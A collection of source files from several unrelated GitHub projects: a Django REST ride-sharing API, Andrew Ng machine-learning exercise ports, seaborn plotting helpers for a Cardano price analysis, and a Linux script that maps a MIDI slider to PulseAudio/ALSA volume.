is_public = models.BooleanField(default=False, help_text="public circle")
is_limited = models.BooleanField(default=False, help_text="limited circles")
limit = models.PositiveIntegerField(default=0, help_text="limit")
members = models.ManyToManyField('users.User', through='circles.Membership', through_fields=('circle', 'user'))
def __str__(self):
return self.name
class Meta(CRideModel.Meta):
"""Class meta"""
ordering = ['-rides_taken', '-rides_offered']
```
#### File: circles/models/memberships.py
```python
from django.db import models
from cride.utils.models import CRideModel
class Membership(CRideModel):
"""Membership model
a membership is a table that holds the relatioship
between a circle and a user"""
user = models.ForeignKey('users.User', on_delete=models.CASCADE)
profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
circle = models.ForeignKey('circles.Circle', on_delete=models.CASCADE)
is_admin = models.BooleanField(
default=False,
help_text="Circle admins can update the circle's data and manage its members."
)
# Invitations
invited_by = models.ForeignKey('users.User', on_delete=models.SET_NULL, null=True, related_name='invited_by')
userd_invitations = models.PositiveSmallIntegerField(default=0)
remaining_invitations = models.PositiveSmallIntegerField(default=0)
# stats
rides_taken = models.PositiveIntegerField(default=0)
rides_offered = models.PositiveIntegerField(default=0)
is_active = models.BooleanField(
default=True,
help_text="Onli active users can interact in the circle."
)
def __str__(self):
return f'@{self.user.username} at #{self.circle.slug_name}'
class Meta(CRideModel.Meta):
"""Class meta"""
ordering = ['-rides_taken', '-rides_offered']
```
#### File: circles/views/circles.py
```python
from rest_framework import viewsets, mixins
# Permissions
from cride.circles.permissions.circles import IsCircleAdmin
from rest_framework.permissions import IsAuthenticated
from cride.circles.serializers import CircleModelSerializer
from cride.circles.models import Circle, Membership, circles
# Filters
from rest_framework.filters import SearchFilter, OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
class CircleViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""Circle viewset"""
serializer_class = CircleModelSerializer
permission_classes = (IsAuthenticated,)
lookup_field = 'slug_name'
filter_backends = (SearchFilter, OrderingFilter, DjangoFilterBackend)
search_fields = ("slug_name", "name")
ordering_fields = ("rides_taken", "rides_offered", "name", "created")
ordering = ('-members', 'rides_offered', 'rides_taken')
filter_fields = ('verified', 'is_limited')
def get_queryset(self):
queryset = Circle.objects.all()
if self.action == 'list':
queryset = Circle.objects.filter(is_public=True)
return queryset
def get_permissions(self):
permissions = [IsAuthenticated]
if self.action in ['update', 'partial_update']:
permissions.append(IsCircleAdmin)
return [p() for p in permissions]
def perform_create(self, serializer):
"""Assign circle admin"""
circle = serializer.save()
user = self.request.user
profile = user.profile
Membership.objects.create(
user = user,
profile = profile,
circle = circle,
is_admin = True,
remaining_invitations = 10
)
```
#### File: rides/serializers/rides.py
```python
from rest_framework import serializers
from cride.users.serializers import UserModelSerializer
from cride.rides.models import Ride
from cride.users.models import User
from cride.circles.models import Membership, memberships
from datetime import timedelta
from django.utils import timezone
class CreateRideSerializer(serializers.ModelSerializer):
offered_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
available_seats = serializers.IntegerField(min_value=1, max_value=15)
class Meta:
"""Meta class"""
model = Ride
exclude = ("passengers", "rating", "is_active", "offered_in")
def validate_departure_date(self,data):
"""Verify date is not in the pass"""
min_date = timezone.now() - timedelta(minutes=15)
if data < min_date:
serializers.ValidationError('Departure time must be at least passing the next 20 minutes window.')
return data
def validate(self, data):
user = data['offered_by']
circle = self.context['circle']
if self.context['request'].user != user:
raise serializers.ValidationError('Rides offered on behalf of others are not allowed.')
try:
membership = Membership.objects.get(user=user, circle=circle, is_active=True)
except Membership.DoesNotExist:
raise serializers.ValidationError('User is not an active member of the circle.')
if data['arrival_date'] <= data['departure_date']:
raise serializers.ValidationError('Departure date must happen after arrival date.')
self.context['membership'] = membership
return data
def create(self, data):
circle = self.context['circle']
ride = Ride.objects.create(**data, offered_in=circle)
# Circle
circle.rides_offered += 1
circle.save()
# Membership
membership = self.context['membership']
membership.rides_offered += 1
membership.save()
# profile
profile = data['offered_by'].profile
profile.rides_offered += 1
profile.save()
return ride
class JoinRideSerializer(serializers.ModelSerializer):
passenger = serializers.IntegerField()
class Meta:
"""Meta class"""
model = Ride
fields = ("passenger",)
def validate_passenger(self, data):
try:
user = User.objects.get(pk=data)
except User.DoesNotExist:
raise serializers.ValidationError('Invalid passenger.')
circle = self.context['circle']
try:
member = Membership.objects.get(user=user, circle=circle, is_active=True)
except Membership.DoesNotExist:
raise serializers.ValidationError('User is not an active member of the circle.')
self.context['user'] = user
self.context['member'] = member
return data
def validate(self, data):
offset = timezone.now() - timedelta(minutes=15)
ride = self.context['ride']
if ride.departure_date <= offset:
raise serializers.ValidationError("You can't join this ride now.")
if ride.available_seats < 1:
raise serializers.ValidationError("Ride is already full.")
if ride.passengers.filter(pk=data['passenger']).exists():
raise serializers.ValidationError("Passenger is already in this ride.")
return data
def update(self, instance, data):
ride = instance
user = self.context['user']
circle = self.context['circle']
ride.passengers.add(user)
profile = user.profile
profile.rides_taken += 1
profile.save()
member = self.context['member']
member.rides_taken += 1
member.save()
circle.rides_taken += 1
circle.save()
return ride
class EndRideSerializer(serializers.ModelSerializer):
current_time = serializers.DateTimeField()
class Meta:
"""Meta class"""
model = Ride
fields = ("is_active", "current_time")
def validate_current_time(self, data):
ride = self.context['view'].get_object()
if data <= ride.departure_date:
raise serializers.ValidationError('Ride has not started yet')
return data
class RideModelSerializer(serializers.ModelSerializer):
offered_by = UserModelSerializer(read_only=True)
offered_in = serializers.StringRelatedField(read_only=True)
passengers = UserModelSerializer(read_only=True, many=True)
class Meta:
model = Ride
fields = "__all__"
read_only_fields = ('offered_by', 'offered_in', 'rating')
def update(self, instance, validated_data):
now = timezone.now()
if instance.departure_date <= now:
raise serializers.ValidationError('Ongoing rides can not be modified.')
return super(RideModelSerializer, self).update(instance, validated_data)
```
#### File: rides/views/rides.py
```python
from datetime import timedelta
from django.utils import timezone
from cride.rides import serializers
from rest_framework import mixins, viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from cride.rides.serializers import CreateRideSerializer, RideModelSerializer, JoinRideSerializer, EndRideSerializer, CreateRideRatingSerializer
from cride.circles.models import Circle
from rest_framework.permissions import IsAuthenticated
from cride.circles.permissions.memberships import IsActiveCircleMember
from cride.rides.permissions.rides import IsRideOwner, IsNotRideOwner
# Filters
from rest_framework.filters import SearchFilter, OrderingFilter
class RideViewSet(mixins.CreateModelMixin, mixins.ListModelMixin,mixins.UpdateModelMixin,mixins.RetrieveModelMixin, viewsets.GenericViewSet):
"""Ride User"""
permission_classes = (IsAuthenticated, IsActiveCircleMember)
filter_backends = (SearchFilter, OrderingFilter)
search_fields = ("departure_location", "arrival_location")
ordering_fields = ("departure_date", "arrival_date", "available_seats",)
ordering = ('departure_date', 'arrival_date', 'available_seats')
def dispatch(self, request, *args, **kwargs):
"""Verify that circle exists"""
slug_name = kwargs['slug_name']
self.circle = get_object_or_404(Circle, slug_name=slug_name)
return super(RideViewSet, self).dispatch(request, *args, **kwargs)
def get_permissions(self):
permissions = [IsAuthenticated, IsActiveCircleMember]
if self.action in ['update', 'partial_update', 'finish']:
permissions.append(IsRideOwner)
if self.action == 'join':
permissions.append(IsNotRideOwner)
return [p() for p in permissions]
def get_serializer_context(self):
context = super(RideViewSet, self).get_serializer_context()
context['circle'] = self.circle
return context
def get_serializer_class(self):
if self.action=='create':
return CreateRideSerializer
if self.action=='join':
return JoinRideSerializer
if self.action=='finish':
return EndRideSerializer
if self.action=='rate':
return CreateRideRatingSerializer
return RideModelSerializer
def get_queryset(self):
if self.action!='finish':
offset = timezone.now() - timedelta(minutes=15)
return self.circle.ride_set.filter(departure_date__gte=offset, is_active=True, available_seats__gte=1)
return self.circle.ride_set.all()
@action(detail=True, methods=['post'])
def join(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(ride, data={'passenger': request.user.pk}, context={'circle': self.circle, 'ride': ride}, partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_200_OK)
@action(detail=True, methods=['post'])
def finish(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(ride, data={'is_active': False, 'current_time': timezone.now()}, context=self.get_serializer_context(), partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_200_OK)
@action(detail=True, methods=['post'])
def rate(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
context = self.get_serializer_context()
context['ride'] = ride
serializer = serializer_class(data=request.data, context=context, partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_201_CREATED)
```
#### File: cride/taskapp/tasks.py
```python
from django.template.loader import render_to_string
from django.utils import timezone
from datetime import timedelta
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from cride.users.models import User, Profile
from cride.rides.models import Ride
import jwt
import time
# Celery
from celery.decorators import task, periodic_task
def gen_verification_token(user):
"""Create JWT"""
exp_date = timezone.now() + timedelta(days=3)
payload = {
'user': user.username,
'exp': int(exp_date.timestamp()),
'type': 'email_confirmation'
}
token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
return token.decode()
@task(name='send_confirmation_email', max_retries=3)
def send_confirmation_email(user_pk):
"""Send account verifiacion email"""
for i in range(7):
time.sleep(1)
print(f'1 second delay i:{i+1}')
user = User.objects.get(pk=user_pk)
verification_token = gen_verification_token(user)
subject = f"Welcome {user.username}! Verify your account to start using the app"
from_email = 'Comparte Ride <<EMAIL>>'
to = user.email
content = render_to_string('email/users/account_verification.html', {'token': verification_token, 'user': user})
msg = EmailMultiAlternatives(subject, content, from_email, [to])
msg.attach_alternative(content, "text/html")
msg.send()
pass
@periodic_task(name='disable_finished_rides', run_every=timedelta(days=1))
def disable_finished_rides():
now = timezone.now()
offset = now + timedelta(seconds=5)
rides = Ride.objects.filter(arrival_date__gte=now, arrival_date__lte=offset, is_active=True)
rides.update(is_active=False)
```
|
{
"source": "jesussantana/Machine-Learning-Stanford-University",
"score": 3
}
|
#### File: Ex2-Logistic-Regression/ex2-py/predict.py
```python
import numpy as np
from sigmoid import sigmoid
def predict(theta, X):
theta = theta.reshape((theta.size, 1))
p = sigmoid(X.dot(theta))
return np.round(p)
```
#### File: Ex3-Neural-Networks/ex3-py/oneVsAll.py
```python
import numpy as np
from scipy.optimize import fmin_cg
from sigmoid import sigmoid
from lrCostFunction import lrCostFunction
def oneVsAll(X, y, num_labels, lamda):
m, n = X.shape
all_theta = np.zeros((num_labels, n + 1))
X = np.hstack((np.ones((m, 1)), X))
cost_function = lambda p, y: lrCostFunction(p, X, y, lamda)[0]
grad_function = lambda p, y: lrCostFunction(p, X, y, lamda)[1]
for i in range(1, num_labels + 1):
initial_theta = np.zeros(n + 1)
all_theta[i - 1, :] = fmin_cg(cost_function, initial_theta, fprime=grad_function,
args=((y == i).astype(int),), maxiter=100, disp=False)
print('Finish oneVsAll checking number: %d' % i)
return all_theta
```
#### File: Ex3-Neural-Networks/ex3-py/predictOneVsAll.py
```python
import numpy as np
from sigmoid import sigmoid
def predictOneVsAll(all_theta, X):
m = X.shape[0]
X = np.hstack((np.ones((m, 1)), X))
p = np.argmax(sigmoid(X.dot(all_theta.T)), axis=1) + 1
return p.reshape((p.size, 1))
```
|
{
"source": "jesussantana/Predicting-Cardano-Price",
"score": 2
}
|
#### File: Predicting-Cardano-Price/scripts/display_graphics.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# ^^^ pyforest auto-imports - don't write above this line
# ==============================================================================
# Auto Import Dependencies
# ==============================================================================
# pyforest imports dependencies according to use in the notebook
# ==============================================================================
# Dependencies not Included in Auto Import*
# ==============================================================================
import matplotlib.ticker as ticker
# Disribution of Target Variable
# ==============================================================================
def Target_Distribution(df, target):
fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(15, 10))
sns.distplot(
df[target],
hist = False,
rug = True,
color = "navy",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[0]
)
axes[0].set_title("Original layout", fontsize = 'medium')
axes[0].set_xlabel(f'{target}', fontsize='small')
axes[0].tick_params(labelsize = 6)
sns.distplot(
np.sqrt(df[target]),
hist = False,
rug = True,
color = "purple",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[1]
)
axes[1].set_title("Square root transformation", fontsize = 'medium')
axes[1].set_xlabel(f'sqrt(var)', fontsize='small')
axes[1].tick_params(labelsize = 6)
"""sns.distplot(
np.log(df[target]),
hist = False,
rug = True,
color = "coral",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[2]
)
axes[2].set_title("Logarithmic transformation", fontsize = 'medium')
axes[2].set_xlabel(f'log({target})', fontsize='small')
axes[2].tick_params(labelsize = 6)
"""
fig.suptitle(f'Distribution of the {target} Variable', fontsize = 30, fontweight = "bold")
fig.tight_layout()
plt.savefig(f"../reports/figures/{target}_Distribution_Variable.png")
# Distribution graph for each numerical variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Numerical_Distribution(df, var, name, cols, rows):
fig, axes = plt.subplots(ncols=cols, nrows=rows, figsize=(cols*5, rows*5))
axes = axes.flat
columnas_numeric = df.select_dtypes(include=['float64', 'int']).columns
columnas_numeric = columnas_numeric.drop(f'{var}')
for i, colum in enumerate(columnas_numeric):
sns.histplot(
data = df,
x = colum,
stat = "count",
kde = True,
color = (list(plt.rcParams['axes.prop_cycle'])*2)[i]["color"],
line_kws= {'linewidth': 2},
alpha = 0.3,
ax = axes[i]
)
axes[i].set_title(colum, fontsize = 16, fontweight = "bold")
axes[i].tick_params(labelsize = 16)
axes[i].set_xlabel("")
fig.tight_layout()
plt.subplots_adjust(top = 0.9)
fig.suptitle(f'Distribution Numerical Variable {name}' , fontsize = cols*4, fontweight = "bold")
plt.savefig(f'../reports/figures/Distribution_Numerical_Variable_{name}.png')
# Correlation & Distribution graph for each numerical variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Numerical_Correlation(df, target, drop ,cols, rows):
fig, axes = plt.subplots(ncols=cols, nrows=rows, figsize=(cols*5, rows*5))
axes = axes.flat
columnas_numeric = df.select_dtypes(include=['float64', 'int']).columns
columnas_numeric = columnas_numeric.drop(drop)
for i, colum in enumerate(columnas_numeric):
sns.regplot(
x = df[colum],
y = df[target],
color = "navy",
marker = '.',
scatter_kws = {"alpha":0.4},
line_kws = {"color":"r","alpha":0.7},
ax = axes[i]
)
axes[i].set_title(f"{target} vs {colum}", fontsize = 16, fontweight = "bold")
#axes[i].ticklabel_format(style='sci', scilimits=(-4,4), axis='both')
axes[i].yaxis.set_major_formatter(ticker.EngFormatter())
axes[i].xaxis.set_major_formatter(ticker.EngFormatter())
axes[i].tick_params(labelsize = 16)
axes[i].set_xlabel("")
axes[i].set_ylabel("")
#if (i-1 >= len(columnas_numeric)-1): break
# Empty axes are removed
"""for i in [8]:
fig.delaxes(axes[i])"""
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'Correlation with {target}', fontsize = cols*4, fontweight = "bold")
plt.savefig(f"../reports/figures/Correlation_Each_Numerical_Variable_with_{target}.png")
# Correlation between numeric columns
# ==============================================================================
def tidy_corr_matrix(df):
# Function to convert a pandas correlation matrix to tidy format
#df.drop(drop)
corr_mat = df.select_dtypes(include=['float64', 'int']).corr(method='pearson')
corr_mat = corr_mat.stack().reset_index()
corr_mat.columns = ['variable_1','variable_2','r']
corr_mat = corr_mat.loc[corr_mat['variable_1'] != corr_mat['variable_2'], :]
corr_mat['abs_r'] = np.abs(corr_mat['r'])
corr_mat = corr_mat.sort_values('abs_r', ascending=False)
return corr_mat
# Heatmap matrix of correlations
# ==============================================================================
def heat_map(df, name):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(15, 15))
#df.drop(drop)
corr= df.select_dtypes(include=['float64', 'int']).corr(method='pearson').corr()
# Getting the Upper Triangle of the co-relation matrix
matrix = np.triu(corr)
# using the upper triangle matrix as mask
sns.heatmap(corr,
annot=True,
mask=matrix,
cmap=sns.diverging_palette(150, 275, s=80, l=55, n=9),
annot_kws = {"size": 10})
ax.set_xticklabels(
ax.get_xticklabels(),
rotation = 45,
horizontalalignment = 'right',
)
ax.set_yticklabels(
ax.get_yticklabels(),
rotation = 0,
horizontalalignment = 'right',
)
ax.tick_params(labelsize = 15)
fig.suptitle(f'Heatmap Correlation Matrix {name}', fontsize = 30, fontweight = "bold")
plt.savefig(f"../reports/figures/Heatmap_Matrix_Correlations_{name}.png")
# Graph for each qualitative variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Qualitative_Distribution(df, name, rows, cols):
fig, axes = plt.subplots(nrows=rows, ncols=cols, figsize=(rows*10, rows*50))
axes = axes.flat
columnas_object = df.select_dtypes(include=['object']).columns
for i, colum in enumerate(columnas_object):
df[colum].value_counts().plot.barh(ax = axes[i])
axes[i].set_title(colum, fontsize = 16, fontweight = "bold")
axes[i].tick_params(labelsize = 11)
axes[i].set_xlabel("")
# Empty axes are removed
#for i in [7, 8]:
#fig.delaxes(axes[i])
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'Qualitative variable distribution {name}',
fontsize = 30, fontweight = "bold")
plt.savefig(f"../reports/figures/Each_Qualtitative_Variable_{name}.png")
# Graph relationship between the Target and each qualitative variables
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Qualitative_Relationship(df, var, rows, cols):
fig, axes = plt.subplots(nrows=rows, ncols=cols, figsize=(100, 60))
axes = axes.flat
columnas_object = df.select_dtypes(include=['object']).columns
for i, colum in enumerate(columnas_object):
sns.violinplot(
x = colum,
y = var,
data = df,
color = "coral",
ax = axes[i]
)
axes[i].set_title(f"{colum} vs {var}", fontsize = 30, fontweight = "bold")
axes[i].yaxis.set_major_formatter(ticker.EngFormatter())
axes[i].tick_params(labelsize = 22)
axes[i].set_xticklabels(axes[i].get_xticklabels(),rotation = 45, horizontalalignment = 'right')
axes[i].set_xlabel("")
axes[i].set_ylabel("")
# Empty axes are removed
#for i in [7, 8]:
#fig.delaxes(axes[i])
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'{var} distribution by group', fontsize = 60, fontweight = "bold")
plt.savefig(f"../reports/figures/Target_vs_Qualitative_Variable_{var}.png")
# Graph adjusted intertia BestK for KMeans
# ==============================================================================
def inertia(results):
# plot the results
plt.figure(figsize=(14,8))
plt.plot(results,'-o')
plt.title('Adjusted Inertia for each K')
plt.xlabel('K')
plt.ylabel('Adjusted Inertia')
plt.xticks(range(2,len(results),1))
plt.savefig("../../reports/figures/BestK_for_KMeans.png");
# Graph PCA
# ==============================================================================
def pca(pca):
PC = range(1, pca.n_components_+1)
plt.figure(figsize=(12,6))
plt.bar(PC, pca.explained_variance_ratio_, color=('navy','b','g','r','coral','c','m','y','k','gray'))
plt.xlabel('Principal Components')
plt.ylabel('Variance %')
plt.title('Principal Components Variance')
plt.xticks(PC);
plt.savefig(f"../../reports/figures/Principal_Components{pca.n_components}.png");
```
|
{
"source": "jesusvallejo/Midi2Vol-Linux",
"score": 2
}
|
#### File: jesusvallejo/Midi2Vol-Linux/midi2vol.py
```python
import sys
import os
import rtmidi
import math
import time
import pulsectl
import alsaaudio
import json
import logging
import getpass
import threading
import subprocess
import shutil
from datetime import datetime
import pystray
from pystray import MenuItem as MenuItem
from PIL import Image, ImageDraw
# paths
defaultPath=os.path.dirname(os.path.realpath(__file__)) # to force the location os.path.expanduser('~/MidiDev/')
eOS_iconPath=os.path.expanduser('~/.local/share/icons/')
iconsPath=os.path.join(defaultPath,'icons')
# filenames
filename=os.path.splitext(os.path.basename(__file__))[0]
defaultAppConfigFile='appConfig.json'
defaultConfigFile='config.json'
defaultLogginFile=filename+'.log'# to force a logging name 'midi2vol.log'
iconCon_img='NanoSlider.png'
iconDis_img='NanoSliderDis.png'
iconCon_tray='TrayWhiteIconCon.png'
iconDis_tray='TrayWhiteIconDis.png'
# Default json
appConfigJson = """ [
{"name": "Default","AppRaw": "0x3e","PulseName": "default"},
{"name": "Spotify","AppRaw": "0x3f","PulseName": "Spotify"},
{"name": "Discord","AppRaw": "0x40","PulseName": "playStream"},
{"name": "Google Chrome","AppRaw": "0x41","PulseName": "Playback"},
{"name": "Firefox","AppRaw": "0x41","PulseName": "AudioStream"}
]"""
configJson = """ {
"NotifyStatus": "true",
"trayBarIcon": "default",
"audioService":"pulse"
} """
# flags
elementaryOS=False
noNotify = False
SHOULD_TERMINATE = False
def eOSNotification(defaultPath,eOS_iconPath,iconCon_img,iconDis_img):
global elementaryOS
elementaryOS = True
if os.path.isfile(os.path.join(eOS_iconPath,iconCon_img)) == False:
shutil.copyfile(os.path.join(iconsPath,iconCon_img), os.path.join(eOS_iconPath,iconCon_img))
if os.path.isfile(os.path.join(eOS_iconPath,iconDis_img)) == False:
shutil.copyfile(os.path.join(iconsPath,iconDis_img), os.path.join(eOS_iconPath,iconDis_img))
def bento():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoBento.png'
iconDis_img = 'NanoBentoDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def wavez():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoWavez.png'
iconDis_img = 'NanoWavezDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def mizu():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoMizu.png'
iconDis_img = 'NanoMizuDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def trayIcon(icon_img):
global icon
image=Image.open(icon_img)
menu = (pystray.MenuItem('Exit', lambda:endProgram()),)
icon=pystray.Icon(filename, image,filename,menu)
return icon
def endProgram():
global icon ,t,SHOULD_TERMINATE
if( threading.current_thread() == threading.main_thread()):
print("main")
else:
print("not main")
SHOULD_TERMINATE = True
t.join()
icon.visible = False
icon.stop()
sys.exit("midi stopped\n")
def sendmessage(status):
if(noNotify):
return
global iconCon,iconDis,iconConTray,iconDisTray
iconCon = os.path.join(iconsPath,iconCon_img)
iconDis = os.path.join(iconsPath,iconDis_img)
iconConTray = os.path.join(iconsPath,iconCon_tray)
iconDisTray = os.path.join(iconsPath,iconDis_tray)
if(status =='connected'):
image=Image.open(iconConTray)
icon.icon = image
text='nano. slider is ready'
img = iconCon
if(elementaryOS):
img= os.path.splitext(iconCon_img)[0]
elif(status == 'disconnected'):
image=Image.open(iconDisTray)
icon.icon = image
text='nano. slider is not present'
img = iconDis
if(elementaryOS):
img= os.path.splitext(iconDis_img)[0]
subprocess.Popen(["notify-send", "-i", img, filename, text])
return
def openNano(midi_in):
count=nanoIsConnected(midi_in) # returns true if port is correctly opened, false if not
if (count!=-1):
midi_in.open_port(count)
logging.warning('openNano: opened port successfully')
return True
else:
logging.error('openNanoError: could not find nano. slider')
return False
def nanoIsConnected(midi_in): #if nano is connected returns position in list, if not returns -1
count = 0
for port_name in midi_in.get_ports():
if (port_name.split(":")[0] == "nano. slider"):
#logging.warning('nano. slider found')
return count
else:
count = count + 1
logging.warning('could not find nano. slider')
return -1
def execution(midi_in,sinkType,appConfig):
global iconCon,iconDis,SHOULD_TERMINATE
iconCon = os.path.join(iconsPath,iconCon_img)
iconDis = os.path.join(iconsPath,iconDis_img)
oldVolumeRaw = -1
paready = False
if (openNano(midi_in)): # if connected to nano , check if there's a message
while (nanoIsConnected(midi_in) != -1 and SHOULD_TERMINATE == False):
global reported
reported=False
midiMessage= midi_in.get_message()
if (midiMessage): # if rtmidi gives None as a message , sleep the thread to avoid overloading cpu
message = midiMessage[0] # rtmidi lib , passes a tuple [midiMessage , timeStamp], we need the message
applicationRaw=message[1] # gives option to change volume of source ex: Spotify , Chrome, etc.
volumeRaw = message[2] # Message is an array in wich the third argument is the value of the potentiometer slider from 0 to 127
if (volumeRaw > oldVolumeRaw+1 or volumeRaw < oldVolumeRaw-1): # check if slider positon has changed
oldVolumeRaw= volumeRaw #update value for next iteration
if(sinkType=="alsa"): # if alsa is chosen values go from 0 to 100
volume = math.floor((volumeRaw/3)*2.38)
alsaaudio.Mixer().setvolume(volume) # change volume with alsa
elif(sinkType=="pulse"): # if pulse audio is chosen values go from 0 to 1 , in 0.01 steps
if(paready==False): # check if pulse audio server is running or will panick
stat = os.system('pulseaudio --check')
if(stat == 0):
paready = True
sendmessage('connected')
logging.warning('midi2vol -p is ready')
else:
logging.warning('PulseAudio server is not avaible')
else:
logging.warning('llamada a pulse') # If PulseAudio server is ready change volume with pulse
pulseSink(midi_in,applicationRaw,volumeRaw,appConfig)
time.sleep(0.01) # Sleep thread for a while
if(SHOULD_TERMINATE==True): # Exit has been called kill my self
sys.exit('killing thread')
logging.error('executionError: could find nano. slider midi interface')
sendmessage('disconnected')
if (midi_in.is_port_open()): # Close midi port
midi_in.close_port()
while (nanoIsConnected(midi_in)==-1): # Actively poll to detect nano slider reconnection
time.sleep(0.5) # To not overflow the recursion stack
execution(midi_in,sinkType,appConfig) # Nano is now present launch thread
def pulseSink(MidiIn,applicationRaw,volumeRaw,appConfig): # Checks midi hex against the json
volume = math.floor((volumeRaw/3)*2.38)/100
with pulsectl.Pulse('event-printer') as pulse:
default = appConfig[0]
if (hex(applicationRaw)== default['AppRaw']):
pulseAllSink(volume,pulse)
else:
logging.warning('App Volume selected:%s'%(hex(applicationRaw)))
pulseApp(volume,pulse,applicationRaw,appConfig)
def pulseAllSink(volume,pulse): # Changes all output sinks volume
for sink in pulse.sink_list():
pulse.volume_set_all_chans(sink, volume)
logging.warning('Volume %d set for all sinks'%(volume*100))
def pulseApp(volume,pulse,applicationRaw,appConfig): # Controls per app volume using pulse
for app in appConfig:
if(app['AppRaw'] == hex(applicationRaw)):
if(pulse.sink_input_list()==[]):
logging.warning('no apps playing audio')
for source in pulse.sink_input_list():
name = source.name
if (name == app['PulseName']): # if sink input exists
sinkVolume = source.volume
sinkVolume.value_flat = volume
pulse.volume_set(source,sinkVolume)
logging.warning('Volume %d set for application %s: %s'%(volume*100,app['name'],hex(applicationRaw)))
break
def loadAppConfig(targetfile):
try:
with open(targetfile) as f:
try:
global appConfig
appConfig = json.load(f)
logging.warning('%s correctly loaded'%(targetfile))
except:
os.rename(os.path.realpath(targetfile), os.path.realpath(targetfile)+".bak")
f = open(os.path.realpath(targetfile), "w")
logging.warning('Error loading %s,backing up old one, creating new one(check parsing)'%(targetfile))
f.write(appConfigJson)
f.close()
main()
except:
logging.warning('Error loading %s, will create a new one'%(targetfile))
f= open(targetfile,"w+")
f.write(appConfigJson)
f.close()
main()
def loadConfig(targetfile):
try:
with open(targetfile) as f:
try:
global config
config = json.load(f)
logging.warning('%s correctly loaded'%(targetfile))
except:
os.rename(os.path.realpath(targetfile), os.path.realpath(targetfile)+".bak")
f = open(os.path.realpath(targetfile), "w")
logging.warning('Error loading %s,backing up old one, creating new one(check parsing)'%(targetfile))
f.write(configJson)
f.close()
main()
except:
logging.warning('Error loading %s, will create a new one'%(targetfile))
f= open(targetfile,"w+")
f.write(configJson)
f.close()
main()
def main():
global appConfig , config , t
argv = sys.argv
if (len(argv)>1): # console mode
count=0
targetfile = os.path.join(defaultPath,defaultAppConfigFile)
for arg in argv:
if(arg == '--noicon'):
global noNotify
noNotify= True
if(arg == '--bento'):
bento()
if(arg == '--wavez'):
wavez()
if(arg == '--mizu'):
mizu()
if(arg == "-e"):
eOSNotification(defaultPath,eOS_iconPath,iconCon_img,iconDis_img)
if(arg == "-d"):
logging.basicConfig(filename=os.path.join(defaultPath,defaultLogginFile),level=logging.WARNING)
logging.warning('----------------------------')
logging.warning(datetime.now())
logging.warning('----------------------------')
logging.warning(getpass.getuser())
logging.warning('----------------------------')
if(arg =='-t'):
targetfile = argv[count+1]
logging.warning(targetfile)
count = count+1
loadAppConfig(targetfile)
for arg in argv:
if(arg== "--pulse" or arg== "-p"):
try:
global icon
icon = trayIcon(os.path.join(iconsPath,iconCon_tray))
time.sleep(3) # SEEMS TO HELP WITH APPS PROBLEM(PULSEAUDIO SEES ALL SINKS, BUT DOESNT SINK INPUTS, RESULTING IN PER APP CONTROL NOT WORKING)
midi_in = rtmidi.MidiIn()
t=threading.Thread(name = 'midiExecution',target = execution,args =(midi_in,"pulse",appConfig))
t.daemon = True
t.start()
icon.run()
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
elif(arg== "--alsa" or arg== "-a"):
try:
midi_in = rtmidi.MidiIn()
execution(midi_in,"alsa",appConfig)
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
else:
print("Please call me with a valid argument")
print("Unknown argument, For alsa sink use arguments --alsa/-a or --pulse/-p for pulse sink")
sys.exit()
else:
targetfile = os.path.join(defaultPath,defaultAppConfigFile)# AppConfig file
loadAppConfig(targetfile)
targetfile = os.path.join(defaultPath,defaultConfigFile)# AppConfig file
loadConfig(targetfile)
if(config["NotifyStatus"]=="false"):
noNotify=true
if(config["notIcon"]== "mizu"):
mizu()
if(config["notIcon"]== "bento"):
bento()
if(config["notIcon"]== "wavez"):
wavez()
if(config["audioService"]=="pulse"):
try:
icon = trayIcon(os.path.join(iconsPath,iconCon_tray))
time.sleep(3) # SEEMS TO HELP WITH APPS PROBLEM(PULSEAUDIO SEES ALL SINKS, BUT DOESNT SINK INPUTS, RESULTING IN PER APP CONTROL NOT WORKING)
midi_in = rtmidi.MidiIn()
t=threading.Thread(name = 'midiExecution',target = execution,args =(midi_in,"pulse",appConfig))
t.start()
icon.run()
